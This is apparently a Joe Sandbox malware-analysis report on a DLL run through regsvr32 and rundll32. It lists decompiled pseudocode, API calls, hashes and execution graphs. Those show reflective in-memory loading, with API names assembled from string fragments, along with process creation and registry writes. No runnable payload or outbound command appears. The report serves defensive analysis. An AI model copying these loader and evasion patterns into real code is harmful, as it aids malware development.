C-Code - Quality: 47%

			E00007FFD7FFD14661CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x14661d3a;
				E00007FFD7FFD146618F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFD7FFD14661DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0x14661de7;
				E00007FFD7FFD14662170(_t48, _a8);
				_t62 =  *0x146da228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0x14661d65;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0x14661de2;
				r8d = 0;
				if ((E00007FFD7FFD146622B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x14661de2;
				E00007FFD7FFD146618F0(_t52, _a8);
				_v16 = _t52;
				E00007FFD7FFD14662170(_t52, _a8);
				E00007FFD7FFD146611E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFD7FFD146623A0(_v16 +  *_t52, _a8, _v24);
			}

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661D0E

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Part of subcall function 00007FFD14661DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661E56
Part of subcall function 00007FFD14661DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661E98
Part of subcall function 00007FFD14661DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661EAC
Part of subcall function 00007FFD14661DF0: char_traits.LIBCPMTD ref: 00007FFD14661EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661DA2
char_traits.LIBCPMTD ref: 00007FFD14661DCE

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
Instruction ID: 8546c4218f43c7e00c8442cc2609c1fda73855601fc7dc6533be33b8b39b4c96
Opcode Fuzzy Hash: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
Instruction Fuzzy Hash: 4E21A72271CE8581EB50EB66E4A11AEB370FBC77E8F504436EB8D47B59CE6DD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFD7FFD14661DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146621F0(_t44, __rax, _a16, _a24);
				E00007FFD7FFD14662400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFD7FFD14662170(_t49, _a8);
				_t61 =  *0x146da228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0x14661e5b;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0x14661eef;
				r8d = 0;
				if ((E00007FFD7FFD146622B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x14661eef;
				E00007FFD7FFD146618D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFD7FFD146618F0(_t54, _a8);
				_v32 = _t54;
				E00007FFD7FFD14662170(_t54, _a8);
				E00007FFD7FFD146611E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFD7FFD146623A0(_v32 +  *_t54, _a8, _v40);
			}

APIs

Part of subcall function 00007FFD146621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14662217

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14661E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661EAC
char_traits.LIBCPMTD ref: 00007FFD14661EDB

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
Instruction ID: 8fd1fd87e1111bf5fef8abdc8c5b98187f398148fb4dec1c90f75c8ed0853c9a
Opcode Fuzzy Hash: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
Instruction Fuzzy Hash: 70218F7671CF8581EB10EB66F4A11AEA761FBC67E4F000035EA8D47B69CE7CD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14671004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFD7FFD14671004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFD7FFD14672DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0x146de008; // 0x9aee6e3408a0
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0x146df940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0x14671145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0x146710ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x1467109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x1467107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFD7FFD1466D698();
				if (0 == 0) goto 0x1467113d;
				if (0 == 0) goto 0x1467112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x1467113d;
				if (0 + _a24 < 0) goto 0x146710fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0x14671071;
				 *_t74 = GetLastError();
				return E00007FFD7FFD14663A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

APIs

WriteFile.KERNEL32 ref: 00007FFD1467111B
GetLastError.KERNEL32 ref: 00007FFD1467113D

Strings

U, xrefs: 00007FFD146710C7

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: fe71571a13106964c18d66c0e2dd1b1b52a1ccfcd089e806359ed944592294e5
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: 02419322B18A81C5EB208F35E4A43E967A1FB9A7E8F448032EE4D87798DF3CD441C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14672EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD14672EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFD7FFD14666B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x14672ed5;
				if ( *__rcx != 0xe06d7363) goto 0x14672ed5;
				if (_t3 == 1) goto 0x14672edb;
				return _t3;
			}

0x7ffd14672ebd
0x7ffd14672ec6
0x7ffd14672ece
0x7ffd14672ed3
0x7ffd14672eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFD14672EBD

Part of subcall function 00007FFD14666B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFD14666C0C
Part of subcall function 00007FFD14666B4C: RtlUnwindEx.KERNEL32 ref: 00007FFD14666C5B

Strings

csm, xrefs: 00007FFD14672EC8
f, xrefs: 00007FFD14672EC2

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: d76b0c45538e055d49375a7f15c87701c6d404849ac9542eaa37bb18b85383ec
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: B6D0A751F0854785FB39277110E52F806944F5F73EF28C430C968042C7AF1D98E04601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14673ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFD14673F22
RegisterClassExW.USER32 ref: 00007FFD14673F59

Strings

P, xrefs: 00007FFD14673ED9

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: 73fb338376220491ca5271b5ffaef4f46dabb82a38832827fd20dc6f954c2a63
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 1701A472529F8086E7608F10F49435BB7B4F785758F600129E6CD46B68DFBDD158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFD7FFD146645C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFD7FFD14666E00(_t12, _t14, 0x146dcbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffd14664735
0x7ffd14664741
0x7ffd14664746
0x7ffd1466474b
0x7ffd14664758
0x7ffd1466475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFD14664735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFD14664746

Part of subcall function 00007FFD14666E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFD1466472B), ref: 00007FFD14666E7D
Part of subcall function 00007FFD14666E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFD1466472B), ref: 00007FFD14666EBC

Strings

Unknown exception, xrefs: 00007FFD14664751

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: 7e71549b880d41f1e6517efe6b9e5622559cd2390e78272d430c0da029b8d586
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: E6D01722B28E8695EE10DB20E8E03E86331FB8372CF904532E14D815B5DF2CDA4AC380

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 1972, Parent PID: 3808COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 000002735FD40000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 000002735FD40344
VirtualAlloc.KERNELBASE ref: 000002735FD4038A
VirtualProtect.KERNELBASE ref: 000002735FD4085C
RtlAddFunctionTable.KERNEL32 ref: 000002735FD408E9

Strings

eSys, xrefs: 000002735FD40117
lloc, xrefs: 000002735FD400BD
GetN, xrefs: 000002735FD40107
ncti, xrefs: 000002735FD40141
nf, xrefs: 000002735FD40127
Libr, xrefs: 000002735FD4009D
ualA, xrefs: 000002735FD400B5
Cach, xrefs: 000002735FD40100
hIns, xrefs: 000002735FD400EB
onTa, xrefs: 000002735FD40148
RtlA, xrefs: 000002735FD40133
ct, xrefs: 000002735FD400DD
rote, xrefs: 000002735FD400D5
ativ, xrefs: 000002735FD4010F
aryA, xrefs: 000002735FD400A5
Load, xrefs: 000002735FD40095
o, xrefs: 000002735FD4012E
tion, xrefs: 000002735FD400F9
temI, xrefs: 000002735FD4011F
Virt, xrefs: 000002735FD400AD
Flus, xrefs: 000002735FD400E4
Slee, xrefs: 000002735FD40084
truc, xrefs: 000002735FD400F2
Virt, xrefs: 000002735FD400C5
ualP, xrefs: 000002735FD400CD
ddFu, xrefs: 000002735FD4013A

Memory Dump Source

Source File: 00000004.00000002.259467377.000002735FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002735FD40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2735fd40000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: fc376dcf4ce633dc5800fa9e46a48d669e8da9a1b2dccd3f812d3f36d2b850a7
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 1B62E031618F098BD759DF18C88D7AAB7E0FB89300F54462DE88AC7255DB74E642CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000004.00000002.258125944.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5552, Parent PID: 5144COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 0000018849600000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 0000018849600344
VirtualAlloc.KERNELBASE ref: 000001884960038A
VirtualProtect.KERNELBASE ref: 000001884960085C
RtlAvlRemoveNode.NTDLL ref: 00000188496008E9

Strings

ativ, xrefs: 000001884960010F
ncti, xrefs: 0000018849600141
hIns, xrefs: 00000188496000EB
Cach, xrefs: 0000018849600100
onTa, xrefs: 0000018849600148
lloc, xrefs: 00000188496000BD
GetN, xrefs: 0000018849600107
tion, xrefs: 00000188496000F9
Virt, xrefs: 00000188496000C5
ct, xrefs: 00000188496000DD
Virt, xrefs: 00000188496000AD
Slee, xrefs: 0000018849600084
Flus, xrefs: 00000188496000E4
aryA, xrefs: 00000188496000A5
rote, xrefs: 00000188496000D5
eSys, xrefs: 0000018849600117
nf, xrefs: 0000018849600127
Load, xrefs: 0000018849600095
ualP, xrefs: 00000188496000CD
temI, xrefs: 000001884960011F
ddFu, xrefs: 000001884960013A
o, xrefs: 000001884960012E
ualA, xrefs: 00000188496000B5
truc, xrefs: 00000188496000F2
RtlA, xrefs: 0000018849600133
Libr, xrefs: 000001884960009D

Memory Dump Source

Source File: 00000005.00000002.264845981.0000018849600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018849600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_18849600000_rundll32.jbxd

Similarity

API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 1419936716-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 6d9923941b1ea7d5cb1b2ac1261aeaa376f5e33b3d8f7d8601e8adf2b9e11854
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: A462F431618B498BD729DF18CC857BAB3E1FB54304F50866DE88AC7261EF34E542CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000005.00000002.263891789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 4808, Parent PID: 1972COMMON

Execution Graph

Execution Coverage:	17.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	51
Total number of Limit Nodes:	5

Executed Functions

Function 01070000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 01070344
VirtualAlloc.KERNELBASE ref: 0107038A
VirtualProtect.KERNELBASE ref: 0107085C
RtlAddFunctionTable.KERNEL32 ref: 010708E9

Strings

Virt, xrefs: 010700AD
lloc, xrefs: 010700BD
o, xrefs: 0107012E
ddFu, xrefs: 0107013A
ncti, xrefs: 01070141
eSys, xrefs: 01070117
ct, xrefs: 010700DD
nf, xrefs: 01070127
Slee, xrefs: 01070084
Virt, xrefs: 010700C5
Cach, xrefs: 01070100
Load, xrefs: 01070095
rote, xrefs: 010700D5
temI, xrefs: 0107011F
Flus, xrefs: 010700E4
GetN, xrefs: 01070107
aryA, xrefs: 010700A5
ativ, xrefs: 0107010F
tion, xrefs: 010700F9
ualP, xrefs: 010700CD
truc, xrefs: 010700F2
ualA, xrefs: 010700B5
hIns, xrefs: 010700EB
onTa, xrefs: 01070148
RtlA, xrefs: 01070133
Libr, xrefs: 0107009D

Memory Dump Source

Source File: 00000006.00000002.768199718.0000000001070000.00000040.00001000.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1070000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: db47feab17520eab8324a4b84bbc9849d9452e4c5563958d680499da75cb750a
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 28522330A18B498BD759DF18C8857BAB7E0FB89304F14462DE8CBC7255DB34E542CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013CEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 0000000180013EB4

Strings

n, xrefs: 0000000180013DC8
,, xrefs: 0000000180013DE9

Memory Dump Source

Source File: 00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: Create
String ID: n$,
API String ID: 2289755597-3401186129
Opcode ID: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
Instruction ID: 2cb52e6b05ba7e48ba693a2826620437475c4cbbd9ed89f570f000b883edcea4
Opcode Fuzzy Hash: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
Instruction Fuzzy Hash: C251037051C7848FD7B8DF68D08579AFBE0FB88314F108A2EE88DD3250DB7498858B92

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001874 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

